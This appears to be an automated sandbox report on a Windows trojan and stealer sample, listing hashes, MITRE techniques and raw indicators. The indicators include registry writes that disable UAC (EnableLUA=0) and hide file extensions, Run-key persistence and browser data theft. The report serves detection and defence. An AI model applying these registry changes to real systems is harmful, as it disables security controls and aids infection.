559741c9738226c2573fa4188a1a465563926b28d885f80e6507fee91bde626e

Analysis

max time kernel
152s
max time network
159s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
26/12/2023, 05:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

581799237e8f5c3cecfedfb6b8aaeb7a.exe
Size

484KB
MD5

581799237e8f5c3cecfedfb6b8aaeb7a
SHA1

2964ab933b7bf2c7a04ce2fcbc4b7820431c699a
SHA256

559741c9738226c2573fa4188a1a465563926b28d885f80e6507fee91bde626e
SHA512

aeb02472d44741ae40bd0bbb0b54525c76ec54a9d49813684adf1dde60b80d5c9c0214230d5f722761ca1ad0425ba967190fa5c23b520a189a63f617bd40928f
SSDEEP

6144:byEjM5jcA3YDMThyH4JXkUGzekBdxacADVsS3dT/Y5sYl2i69h88HoihJEmYQUmv:byEjMvIIBtYLdsDVVJqkJbrvh/+g

Score

10^/10

evasion persistence spyware stealer trojan

Malware Config

Signatures

Modifies visibility of file extensions in Explorer 2 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	cmd.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	581799237e8f5c3cecfedfb6b8aaeb7a.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	cmd.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	cscript.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	581799237e8f5c3cecfedfb6b8aaeb7a.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	581799237e8f5c3cecfedfb6b8aaeb7a.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	cmd.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	conhost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	cmd.exe

UAC bypass 3 TTPs 64 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found

Executes dropped EXE 3 IoCs

pid	Process
2676	tuYEoMQw.exe
2744	daMIAQkU.exe
2884	JSsssIQc.exe

Loads dropped DLL 22 IoCs

pid	Process
2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2996	581799237e8f5c3cecfedfb6b8aaeb7a.exe
2744	daMIAQkU.exe
2744	daMIAQkU.exe
2744	daMIAQkU.exe
2744	daMIAQkU.exe
2744	daMIAQkU.exe
2744	daMIAQkU.exe
2744	daMIAQkU.exe
2744	daMIAQkU.exe
2744	daMIAQkU.exe
2744	daMIAQkU.exe
2744	daMIAQkU.exe
2744	daMIAQkU.exe
2744	daMIAQkU.exe
2744	daMIAQkU.exe
2744	daMIAQkU.exe
2744	daMIAQkU.exe
2744	daMIAQkU.exe
2744	daMIAQkU.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\daMIAQkU.exe = "C:\\ProgramData\\EKkEgUww\\daMIAQkU.exe"	daMIAQkU.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\daMIAQkU.exe = "C:\\ProgramData\\EKkEgUww\\daMIAQkU.exe"	JSsssIQc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Run\tuYEoMQw.exe = "C:\\Users\\Admin\\JAQkskwo\\tuYEoMQw.exe"	581799237e8f5c3cecfedfb6b8aaeb7a.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\daMIAQkU.exe = "C:\\ProgramData\\EKkEgUww\\daMIAQkU.exe"	581799237e8f5c3cecfedfb6b8aaeb7a.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Run\tuYEoMQw.exe = "C:\\Users\\Admin\\JAQkskwo\\tuYEoMQw.exe"	tuYEoMQw.exe

Checks whether UAC is enabled 1 TTPs 30 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cscript.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cscript.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cscript.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cscript.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\JAQkskwo	JSsssIQc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\JAQkskwo\tuYEoMQw	JSsssIQc.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	\??\c:\windows\installer\{ac76ba86-7ad7-1033-7b44-a90000000001}\pdffile_8.ico	daMIAQkU.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

pid	Process
564	reg.exe
952	reg.exe
1896	reg.exe
1716	reg.exe
920	reg.exe
1204	reg.exe
2064	reg.exe
1064	reg.exe
1400	reg.exe
1308	Process not Found
1088	reg.exe
280	reg.exe
2556	reg.exe
3032	Process not Found
2620	reg.exe
1680	reg.exe
2528	Process not Found
1784	reg.exe
2076	reg.exe
880	reg.exe
1084	reg.exe
3044	reg.exe
2848	reg.exe
1396	reg.exe
2752	reg.exe
2428	reg.exe
572	reg.exe
2788	reg.exe
2848	reg.exe
